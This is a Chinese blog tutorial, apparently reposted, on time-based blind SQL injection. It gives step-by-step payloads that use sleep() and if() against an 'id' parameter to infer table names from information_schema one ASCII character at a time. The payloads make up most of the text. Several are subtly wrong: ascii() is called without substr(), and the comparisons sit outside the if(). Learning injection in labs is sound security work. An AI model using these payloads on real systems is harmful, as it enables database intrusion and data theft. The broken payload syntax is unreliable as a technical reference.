时间盲注

其他 2020-04-01 23:01:23 阅读次数: 0

时间盲注比布尔盲注难度稍高 ,关键在于不论你怎么输入就是不报错

 那么根据什么去判断注入呢  根据请求的时间  请求的时间延时了。

1.猜测参数的包裹情况

id=1这个1要么被'包裹 要么被"包裹  要么被)包裹

先去尝试id= 1’ or sleep(3) %23

如果这个时候直接服务器过了三秒才反应

那么就存在时间注入

2.添加if语句,控制if第一个参数

如果某一个条件正确就延迟三秒,如果错位就返回0 (也就是if第一个参数为1)                                                

id= 1’ or if(1,sleep(3),0) %23

 如果某一个条件为假就直接返回(也就是if第一个参数为0)      

3.控制参数详情

id= 1’ or if((select table_name from information_schema.tables where table_schema=database() limit 0,1),sleep(3),0) %23

为了先验证一下语句有没有错误  我们先table_name当作1

id= 1’ or if((select 1 from information_schema.tables where table_schema=database() limit 0,1),sleep(3),0) %23

可以发现ok

然后用ascii()表示

id= 1’ or if((select ascii(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1),sleep(3),0) %23

接下来看这个数据库的i的一个表名的第一个字符 ascii是不是大于64

id= 1’ or if((select ascii(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1),sleep(3),0) >64 %23

再看看是不是大于96,再看看是不是大于110(这个自己设定)

最终判断出是101那么就是

id= 1’ or if((select ascii(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1),sleep(3),0) =101 %23

猜你喜欢

转载自www.cnblogs.com/cat47/p/12616552.html
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
周排行
购置笔记本常识
从源码看Spring Security之采坑笔记(Spring Boot篇)
大数据学习——高可用配置案例
如何避免选择不专业的建站公司?
Euclid's Game HDU - 1525(博弈)
面试笔记(六)---Js实现eventHandler
Windows 实例搭建的 FTP 在外网无法连接和访问
设计模式 : 桥接模式
USB 设备驱动开发之几个重要结构体分析
14-p14_sqrt求平方根
每日归档
更多
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022